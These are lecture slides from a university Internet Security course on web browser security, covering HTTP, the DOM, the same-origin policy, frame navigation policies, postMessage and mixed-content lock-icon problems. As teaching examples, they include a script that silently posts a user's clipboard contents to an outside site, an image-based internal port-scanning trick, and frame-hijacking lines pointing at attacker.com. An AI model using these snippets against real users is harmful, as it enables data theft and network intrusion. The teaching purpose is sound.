Internet Security

Prof. Anja Feldmann, Ph.D.
anja@net.t-labs.tu-berlin.de
http://www.net.t-labs.tu-berlin.de/

Prof. Dr. Jean-Pierre Seifert
jpseifert@sec.t-labs.tu-berlin.de
http://www.sec.t-labs.tu-berlin.de/
Web Browser Security

Introduction
Browser basics
Security problems
Web Browser Security
Browser and Network

- Browser sends requests
  - May reveal private information (in forms, cookies)
- Browser receives information, code
  - May corrupt state by running unsafe code
- Interaction susceptible to network attacks
  - Consider network security as discussed earlier in this course
Browser security landscape

- Browser design vulnerabilities
  - Does the browser design, if implemented properly, prevent malicious attacks?
  - Main topic of this lecture

- Browser implementation vulnerabilities
  - Browsers can be vulnerable to standard application attacks
    - E.g., buffer overflow from long name for page element
  - Similar in principle to other implementation vulnerabilities
    - Other Lectures, Seminars, Practical courses from Prof. Seifert

- Attacks running under host OS
  - Difficult for browser to defend; can look at Least Privilege
    - Other Lectures, Seminars, Practical courses from Prof. Seifert

- Attacks from network
  - Malicious web site “visited” by user (or sending ad, gadget)
    - This is our main interest for today
  - Attacker who controls network
    - Harder to defend but also important (e.g., wireless cafe access point)
    - Consider network security as discussed earlier in this course
Browser security landscape

- Browser design vulnerabilities
  - Does the browser design, if implemented properly, prevent malicious attacks?
  - Main topic of this lecture
- Browser implementation vulnerabilities
  - Browsers can be vulnerable to standard application attacks
    - E.g., buffer overflow from long name for page element
  - Similar in principle to other implementation vulnerabilities
    - Other Lectures, Seminars, Practical courses from Prof. Seifert
- Attacks running under host OS
  - Difficult for browser to defend; can look at Least Privilege
    - Other Lectures, Seminars, Practical courses from Prof. Seifert
- Attacks from network
  - Malicious web site “visited” by user (or sending ad, gadget)
    - This is our main interest for today
  - Attacker who controls network
    - Harder to defend but also important (e.g., wireless cafe access point)
    - Consider network security as discussed earlier in this course
Vulnerability Stats: web is “winning”

Majority of vulnerabilities now found in web software

Source: MITRE CVE trends
Credits

Adam Barth, Collin Jackson, and the entire Web Security team from Stanford
Sample architecture
HyperText Transfer Protocol

- Used to request and return data
  - Methods: GET, POST, HEAD, ...

- Stateless request/response protocol
  - Each request is independent of previous requests
  - Statelessness has a significant impact on design and implementation of applications

- GET vs POST
Address Bar

- Where this page came from

- But not where the embedded content came from
URLs

- Global identifiers of network-retrievable documents
- **Example:**

  http://stanford.edu:81/class?name=cs155#homework

- Special characters are encoded as hex:
  - %0A = newline
  - %20 or + = space, %2B = + (special exception)
# HTTP Request

<table>
<thead>
<tr>
<th>Method</th>
<th>File</th>
<th>HTTP version</th>
<th>Headers</th>
</tr>
</thead>
<tbody>
<tr>
<td>GET</td>
<td>/index.html</td>
<td>HTTP/1.1</td>
<td>Accept: image/gif, image/x-bitmap, image/jpeg, <em>/</em></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>Accept-Language: en</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>Connection: Keep-Alive</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>Host: <a href="http://www.example.com">www.example.com</a></td>
</tr>
</tbody>
</table>

Data – none for GET

GET:  no side effect.  POST:  possible side effect.
HTTP Response

HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Content-Length: 2543

<HTML> Some data... blah, blah, blah </HTML>
Adding to browser

**Installing ActiveX Controls**

If you install and run, no further control over the code.

In principle, browser/OS could apply sandboxing, other techniques for containing risks in native code. But don’t count on it.
Additions to browser

**ActiveX**

- ActiveX controls reside on client's machine, activated by HTML object tag on the page
  - ActiveX controls are not interpreted by browser
  - Compiled binaries executed by client OS
  - Controls can be downloaded and installed

- Security model relies on three components
  - Digital signatures to verify source of binary
  - IE policy can reject controls from network zones
  - Controls marked by author as *safe for initialization*, *safe for scripting* which affects the way control used

Once accepted, installed and started, no control over execution
Additions to browser

**IE Browser Helper Objects (Extensions)**

- COM components loaded when IE starts up
- Run in same memory context as the browser
- Perform any action on IE windows and modules
  - Detect browser events
    - GoBack, GoForward, and DocumentComplete
  - Access browser menu, toolbar and make changes
  - Create windows to display additional information
  - Install hooks to monitor messages and actions

- Summary: No protection from extensions

Rendering and events

- Basic execution model
  - Each browser window or frame
    - Loads content
    - Renders
      - Processes HTML and scripts to display page
      - May involve images, subframes, etc.
    - Responds to events

- Events can be
  - User actions: OnClick, OnMouseover
  - Rendering: OnLoad
  - Timing: setTimeout(), clearTimeout()
HTML Image Tags

```html
<html>
...
<p> ... </p>
...
<img src="http://example.com/sunset.gif" height="50" width="100">
...
</html>
```

Displays this nice picture ➔

Security issues?
Image tag security issues

- Communicate with other sites

- Hide resulting image
  - `<img src="..." height="1" width="1">`

- Spoof other sites
  - Add logos that fool a user

Very Important Point: A web page can send information to any site
**HTML and Scripts**

```html
<html>
...  
<p> The script on this page adds two numbers

<script>
  var num1, num2, sum  
  num1 = prompt("Enter first number")  
  num2 = prompt("Enter second number")  
  sum = parseInt(num1) + parseInt(num2)  
  alert("Sum = " + sum)  
</script>
...
</html>
```

Browser receives content, displays HTML and executes scripts
The script on this page adds two numbers

**Explorer User Prompt**

**Script Prompt:**
 Enter first number

3

**Windows Internet Explorer**

Sum = 7

OK
Events

<script type="text/javascript">
function whichButton(event) {
  if (event.button==1) {
    alert("You clicked the left mouse button!")
  }
  else {
    alert("You clicked the right mouse button!")
  }
}
</script>

Mouse event causes page-defined function to be called

Other events: onLoad, onMouseMove, onKeyPress, onUnLoad
Click in the document. An alert box will alert which mouse button you clicked.

Windows Internet Explorer

⚠️ You clicked the left mouse button!

OK
Event order

- If an element and one of its ancestors have an event handler for the same event, which one should fire first?"

Element 1
onClick = ...

Element 2
onClick = ...

- MS IE: Bubble-up
- Netscape: Window-down event capture
- W3C: specify event listener with event capture or event bubbling semantics

- Main point for now: different browsers use different methods
  - Convergence over time on many browser issues, but browser application programming involves many significant compatibility issues

See: http://www.quirksmode.org/js/events_order.html
Port scanning behind firewall

- JavaScript can:
  - Request images from internal IP addresses
    - Example: `<img src="192.168.0.4:8080"/>`
  - Use timeout/onError to determine success/failure
  - Fingerprint webapps using known image names
Document object model (DOM)

- Data structure manipulated by JavaScript
  - web page in HTML is structured data
  - DOM provides representation of this hierarchy

- Examples
  - Methods: `document.write(document.referrer)`

- Also Browser Object Model (BOM)
  - `Window`, `Document`, `Frames[]`, `History`, `Location`, `Navigator` (type and version of browser)
Browser and document tree structure

W3C standard differs from models supported in existing browsers
Example

HTML

```html
<ul id="t1">
  <li> Item 1 </li>
</ul>
```

JavaScript

1. `document.getElementById('t1').nodeName`
2. `document.getElementById('t1').nodeValue`
3. `document.getElementById('t1').firstChild.nodeName`
4. `document.getElementById('t1').firstChild.firstChild.nodeName`
5. `document.getElementById('t1').firstChild.firstChild.firstChild.nodeValue`

Example 1 returns "ul"
Example 2 returns "null"
Example 3 returns "li"
Example 4 returns "text"
A text node below the "li" which holds the actual text data as its value
Example 5 returns " Item 1 "

---

29
Changing HTML using Script, DOM

- Some possibilities
  - createElement(elementName)
  - createTextNode(text)
  - appendChild(newChild)
  - removeChild(node)

- Example: Add a new list item:

```javascript
var list = document.getElementById('t1')
var newitem = document.createElement('li')
var newtext = document.createTextNode(text)
list.appendChild(newitem)
newitem.appendChild(newtext)
```
Stealing clipboard contents

- Create hidden form, enter clipboard text, post form

```html
<FORM name="hf" METHOD=POST ACTION="http://www.site.com/targetpage.php" style="display:none">
  <INPUT TYPE="text" NAME="topicID">
  <INPUT TYPE="submit">
</FORM>
<br>
<script language="javascript">
  var content = clipboardData.getData("Text");
  document.forms["hf"].elements["topicID"].value = content;
  document.forms["hf"].submit();
</script>
```
Frame and iFrame

- Window may contain frames from different sources
  - Frame: rigid division as part of frameset
  - iFrame: floating inline frame

- iFrame example

```html
<IFRAME SRC="hello.html" WIDTH=450 HEIGHT=100>
If you can see this, your browser doesn't understand IFRAME.
</IFRAME>
```

- Why use frames?
  - Delegate screen area to content from another source
  - Browser provides isolation based on frames
  - Parent may work even if frame is broken
Remote scripting

- Goal
  - Exchange data between a client-side app running in a browser and server-side app, w/o reloading page

- Methods
  - Java Applet/ActiveX control/Flash
    - Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)
  - XML-RPC
    - open, standards-based technology that requires XML-RPC libraries on server and in your client-side code.
  - Simple HTTP via a hidden IFRAME
    - IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options

Simple remote scripting example

client.html: RPC by passing arguments to server.html in query string

```html
<script type="text/javascript">
function handleResponse() {
    alert('this function is called from server.html')
}
</script>
<iframe id="RSIFrame" name="RSIFrame"
    style="width:0px; height:0px; border: 0px"
    src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>
```

server.html: another page on same server, could be server.php, etc

```html
<script type="text/javascript">
    window.parent.handleResponse()
</script>
```

RPC can be done silently in JavaScript, passing and receiving arguments
## An Analogy

<table>
<thead>
<tr>
<th>Operating system</th>
<th>Web browser</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Primitives</strong></td>
<td><strong>Primitives</strong></td>
</tr>
<tr>
<td>System calls</td>
<td>Document object model</td>
</tr>
<tr>
<td>Processes</td>
<td>Frames</td>
</tr>
<tr>
<td>Disk</td>
<td>Cookies / localStorage</td>
</tr>
<tr>
<td><strong>Principals: Users</strong></td>
<td><strong>Principals: “Origins”</strong></td>
</tr>
<tr>
<td>Discretionary access control</td>
<td>Mandatory access control</td>
</tr>
<tr>
<td><strong>Vulnerabilities</strong></td>
<td><strong>Vulnerabilities</strong></td>
</tr>
<tr>
<td>Buffer overflow</td>
<td>Cross-site scripting</td>
</tr>
<tr>
<td>Root exploit</td>
<td>Universal scripting</td>
</tr>
</tbody>
</table>

Remember: once a user visits attacker.com, attacker can maintain persistent bidirectional communication with a frame in user’s browser.
Web Attacker

- The basic web security threat model
- Attacker capabilities
  - Network
    - Operates a web site on the reachable network
    - Can obtain SSL/TLS Certificate for server
    - May operate other machines on own domain
  - Interaction with user (victim)
    - User visits attacker web site
      - Why? Enticing content, placed by ad network, blind luck, ...
    - Attacker.com is different from honest domains
    - Attacker has no other access to user’s machine
- Variation: Gadget attacker
  - The attacker produces a gadget that is included in otherwise honest mashup (e.g., EvilMaps.com)
Need for isolation

If Google can script other windows, then can steal passwords, post fraudulent bank or retail transactions, etc., etc.
Need for isolation - mashups
Need for isolation - advertisements
Javascript Security Model

- “Sandbox” design
  - No direct file access, restricted network access

- Same-origin policy
  - Frame can only read properties of documents and windows from same place: server, protocol, port

- However, this does not apply to
  - Script loaded in enclosing frame from arbitrary site
    
    ```html
    <script type="text/javascript">
      src="http://www.example.com/scripts/somescript.js">
    </script>
    ```

  - This script runs as if it were loaded from the site that provided the page!

Components of browser security policy

- **Frame-Frame relationships**
  - canScript(A,B)
    - Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?
  - canNavigate(A,B)
    - Can Frame A change the origin of content for Frame B?

- **Frame-principal relationships**
  - readCookie(A,S), writeCookie(A,S)
    - Can Frame A read/write cookies from site S?

- **Security indicator (lock icon)**
  - securityIndicator(W)
    - Is the security indicator displayed for window W?
Lock Icon 2.0

- Extended validation (EV) certs

- Prominent security indicator for EV certificates

- note: EV site loading content from non-EV site does not trigger mixed content warning
Generally misunderstood

- Often simply stated as “same origin policy”
  - This usually just refers to the canScript relation
- Full policy of current browsers is complex
  - Evolved via “penetrate-and-patch”
  - Different features evolved slightly different policies
- Common scripting and cookie policies:
  - canScript considers: scheme, host, and port
  - canReadCookie considers: scheme, host, and path
  - canWriteCookie considers: host
Browser Same Origin Policy (SOP)

Web sites from different domains cannot interact except in very limited ways

- **Applies to:**
  - **Cookies:** cookie from origin A not visible to origin B
  - **DOM:** script from origin A cannot read or set properties for origin B

- **For DOM access, two origins are the same iff**
  - \( (\text{domain-name}, \text{port}, \text{and protocol}) \) are equal

Safari note: until 3.0 SOP was only \( (\text{domain-name}, \text{port}) \)
SOP Examples

Example HTML at www.site.com

Disallowed access:

```
<iframe src="http://othersite.com"></iframe>
alert( frames[0].contentDocument.body.innerHTML )
alert( frames[0].src )
```

Allowed access:

```
<img src="http://othersite.com/logo.gif">
alert( images[0].height )
```

Navigating child frame is allowed (but reading frame[0].src is not):

```
frames[0].location.href = "http://mysite.com/"
```
Cross-frame scripting

- canScript(A,B)
  - Only if Origin(A) = Origin(B)
    - Where origin of a frame is the scheme, host, and network port from which it was loaded
  - This is the basic Same-Origin Policy (SOP)

- Some details
  - Some properties can be read anyway
    - Example: A can read size of B, if A is the parent of B in the DOM hierarchy
Cross-Frame Navigation

- Who decides a frame’s content?

  Permissive Policy
  A frame can navigate any frame

- Permissive policy is used in some browsers; not a great idea
Guninski Attack

If bad frame can navigate good frame, attacker gets password.
Window Policy

A frame can navigate frames in its own window
Gadget Hijacking

top.frames[1].location = "http:/www.attacker.com/...");
top.frames[2].location = "http:/www.attacker.com/...");
...
Gadget Hijacking
Experiment to Determine Policy

- Frame navigation policy not documented
  - Some comments in Firefox source code, but misleading
  - No source code available for IE or Opera

- Extensive frame navigation test case
  - Assumes policy invariants (e.g., left/right symmetric)
  - Attempts 176 navigations, records results
  - Determined policy for Internet Explorer, Firefox, Safari
Possible frame navigation policies

<table>
<thead>
<tr>
<th>Policy</th>
<th>Behavior</th>
</tr>
</thead>
<tbody>
<tr>
<td>Permissive</td>
<td><img src="image" alt="Permissive" /></td>
</tr>
<tr>
<td>Window</td>
<td><img src="image" alt="Window" /></td>
</tr>
<tr>
<td>Descendant</td>
<td><img src="image" alt="Descendant" /></td>
</tr>
<tr>
<td>Child</td>
<td><img src="image" alt="Child" /></td>
</tr>
</tbody>
</table>
## Implemented Browser Policies

<table>
<thead>
<tr>
<th>Browser</th>
<th>Policy</th>
</tr>
</thead>
<tbody>
<tr>
<td>IE 6 (default)</td>
<td>Permissive</td>
</tr>
<tr>
<td>IE 6 (option)</td>
<td>Child</td>
</tr>
<tr>
<td>IE7 (no Flash)</td>
<td>Descendant</td>
</tr>
<tr>
<td>IE7 (with Flash)</td>
<td>Permissive</td>
</tr>
<tr>
<td>Firefox 2</td>
<td>Window</td>
</tr>
<tr>
<td>Safari 3</td>
<td>Permissive</td>
</tr>
<tr>
<td>Opera 9</td>
<td>Window</td>
</tr>
<tr>
<td>HTML 5</td>
<td>Child</td>
</tr>
</tbody>
</table>
Principle: Pixel Delegation

- Frames delegate screen pixels
  - Child cannot draw outside its frame
  - Parent can draw over the child’s pixels

- Navigation similar to drawing
  - Navigation replaces frame contents
  - “Simulate” by drawing over frame

- Policy ought to match pixel delegation
  - Navigate a frame if can draw over the frame
Best Solution: Descendant Policy

- Best security / compatiblity trade-off
  - Security: Respects pixel delegation
  - Compatibly: Least restrictive such policy

- Implementation (Adam and Collin!)
  - Wrote patches for Firefox and Safari
  - Wrote over 1000 lines of regression tests

- Deployment
  - Apple released patch as security update
  - Mozilla shipped policy in Firefox 3
Subtlety: Scripting Policy Interaction

- Is this permissible?
  - Target is not descendant
- **Can** draw over pixels
  1) Inject script into parent
  2) Parent draws the pixels
- Allow navigation
  - **Large** compatibility win
  - No security loss

Correct descendent policy is relational composition of descendant and canScript
Frame Communication

- If frames provide isolation, how can they communicate?

- Desirable properties of interframe communication
  - Confidentiality
  - Integrity
  - Authentication
Fragment Identifier Messaging

- Send information by navigating a frame
  - http://gadget.com/#hello

- Navigating to fragment doesn’t reload frame
  - No network traffic, but frame can read its fragment

- Not a secure channel
  - Confidentiality ✓
  - Integrity ✓
  - Authentication ×

D. Thorpe, Secure Cross-Domain Communication in the Browser
**Basic idea**

Host page (foo.com/main.html)

```javascript
function sendData() {
    iframe.src = "http://bar.com/receiver.html#data_here";
}
```

Iframe (bar.com/receiver.html)

```javascript
window.onload = function () {
    data = window.location.hash;
}
```
Problems and limitations

- No acknowledgement of receipt
  - No ack if the iframe successfully received the data.

- Message overwrites
  - The host does not know when the iframe has finished processing a message, so it doesn’t know when it’s safe to send the next message.

- Capacity limits.
  - URL length limit varies by browser family

- Data has unknown origin

- No replies
  - There’s no way for script in the iframe to pass data back to the host page.

- Loss of context
  - Page is reloaded with every message, losing DOM state
With return communication

Host page (foo.com/main.html)

```javascript
function sendDataToBar() {
    iframe.src = "http://bar.com/receiver.html#data_here";
}
```

iframe (bar.com/receiver.html)

```javascript
window.onLoad = function () {
    data = window.location.hash;
}
```

```javascript
function sendDataToFoo() {
    iframe2.src = "http://foo.com/receiver.html#data_here";
}
```

iframe2 (foo.com/receiver.html)

```javascript
window.onLoad = function () {
    window.parent.parent.receiveFromBar(
        window.location.hash);
}
```
Fix: Improve the protocol

- Proposed Needham-Schroeder-Lowe

\[
\begin{align*}
  A & \rightarrow B : N_A, URI_A \\
  B & \rightarrow A : N_A, N_B, URI_B \\
  A & \rightarrow B : N_B \\
  \ldots \\
  A & \rightarrow B : N_A, N_B, Message_i \\
  B & \rightarrow A : N_A, N_B, Message_j
\end{align*}
\]

- Adoption
  - Microsoft: Windows Live Channels library
  - IBM: OpenAjax Hub 1.1
postMessage

- New API for inter-frame communication
- Supported in latest betas of many browsers

- Not a secure channel
  - Confidentiality ✗
  - Integrity ✓
  - Authentication ✓
Sample use

frames[0].postMessage("Hello world.");

document.addEventListener("message", receiver);
function receiver(e) {
if (e.domain === "example.com") {
  if (e.data === "Hello world") {
    e.source.postMessage("Hello");
  }
}
}
Eavesdrop on Messages

- Descendent frame navigation policy
Eavesdrop on Messages (2)

- Works in all navigation policies
Fix: Change the API

Let the sender specify the recipient:

document.addEventListener("message", receiver);
function receiver(e) {
    if (e.domain == "example.com") {
        if (e.data == "Hello world") {
            e.source.postMessage("Hello", e.domain, e.uri);
        }
    }
}
The Lock Icon

- Goal: identify secure connection
- This is a network security issue
  - SSL/TLS is to protect against active network attacker
  - Lock icon should only be shown when page is secure against network attacker
Checkered History of the Lock

- Positive trust indicator
  - Semantics subtle and not widely understood
    - This page is not under the control of an active network attacker (unless the principal named in the location bar has chosen to trust the attacker).

- Innovation required in user interface design
  - Lock icon largely ignored by users
  - Innovations require browser accuracy in determining whether to show security indicators
Problem with embedded content

- Show lock icon if
  - Page retrieved over HTTPS
  - Every embedded object retrieved over HTTPS
    - Firefox allows HTTP images, but it’s a known bug
  - Every frame would have shown lock icon
Active Attacker Gets Password

Mixed content: Chase *used* a SWF movie served over http to perform authentication on banking login page

Vulnerable to network attack!
Origin Contamination

Gmail: Email from Google - Mozilla Firefox

Gmail is a new kind of webmail, built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all, Gmail has:

Less spam
Keep unwanted messages out of your inbox with Google's innovative technology.

Fast search
Use Google search to find the exact message you want, no matter when it was sent or received.

iGoogle - Mozilla Firefox

iGoogle™
Mixed Content Issues

- Fails to account for canScript relation
  - Every browser fails to consider this issue
  - Implemented correct policy in SafeLock extension

- Also, lots of bugs
  - Fail to detect insecure SWF movies (IE, Firefox)
  - Navigation forgets mixed content (Firefox)
  - Firefox architecture makes detection difficult
# Summary

## Operating system
- **Primitives**
  - System calls
  - Processes
  - Disk
- **Principals: Users**
  - Discretionary access control
- **Vulnerabilities**
  - Buffer overflow
  - Root exploit

## Web browser
- **Primitives**
  - Document object model
  - Frames
  - Cookies / localStorage
- **Principals: “Origins”**
  - Mandatory access control
- **Vulnerabilities**
  - Cross-site scripting
  - Universal scripting

Many interesting security issues, complex feature interaction, many different browsers; additional network (e.g. DNS), UI problems
Stanford Web Security Research

Overview

The Web Security Group is a part of the Stanford Security Lab. Research projects focus on various aspects of browser and web application security.

Publications

Securing the Web Platform

Beware of Finer-Grained Origins
Collin Jackson and Adam Barth
In Web 2.0 Security and Privacy. (WISP 2008)

CurrentTIPS: Cooling A Defense Against Keylogging and Phishing
Collin Jackson and Adam Barth

Protecting Browsers from DNS Rebinding Attacks
Collin Jackson, Adam Barth, Andrew Boyt, Working Draft, and Dan Boneh
In Proc. of the 14th ACM Conf. on Computer and Communications Security. (CCS 2007)

Security for Mashups

Securing Browser Frame Communication
Adam Barth, Collin Jackson, John Mitchell

Protection and Communication Abstractions for Web Browsers in MashupOS
Heather Wang, Raphael Fan, Jon Holmer, and Collin Jackson

MashupOS: Operating System Abstractions for Client Mashups
Jon Holmer, Collin Jackson, Heather Wang, and Raphael Fan
In Proc. of the 21st Workshop on Hot Topics in Operating Systems. (HotOS 2007)

Subspace: Secure Cross-Domain Communication for Web Mashups
Collin Jackson and Heather Wang

Privacy in the Browser

Responsive Private Information by Dynamic Web Applications
Andrew Boyt, Dan Boneh, and Rafael Nady

Protective Browser State from Web Privacy Attacks
Collin Jackson, Andrew Boyt, Dan Boneh, and John Mitchell

People

Adam Barth
Dan Boneh
Andrew Boyt
Collin Jackson
John Mitchell

Workshops

AdFraud Workshop (2007)
1st TIPPI Workshop (2007)
UPU Workshop (2008)
2nd TIPPI Workshop (2008)
1st TIPPI Workshop (2009)

Demonstrations

Anti-Phishing Browser Extensions
Safari Browser Extension
HTML5 PostMessage API
Frame Hijacking
Mixed Content
SSL Man-in-the-Middle Proxy
Randomized Hashing for Digital Certificates: iDentity-Friendly Hashing Techniques
MPEG-4 Frame Carving Techniques

Advisories

CVE-2007-4246
CVE-2007-3855
CVE-2007-6275
CVE-2008-1003
CVE-2008-1004
CVE-2008-1005
CVE-2008-1007

Open Source Outreach

WebKit
Mozilla
Bug 171245
Bug 468052
Bug 18837
Bug 469901
Bug 18614
Bug 403650
Bug 18775
Bug 403682
Bug 188109
Bug 401517
Bug 18522
Bug 384672
Bug 18522
Bug 387700
Bug 18632
Bug 518054
Bug 18911
Bug 514000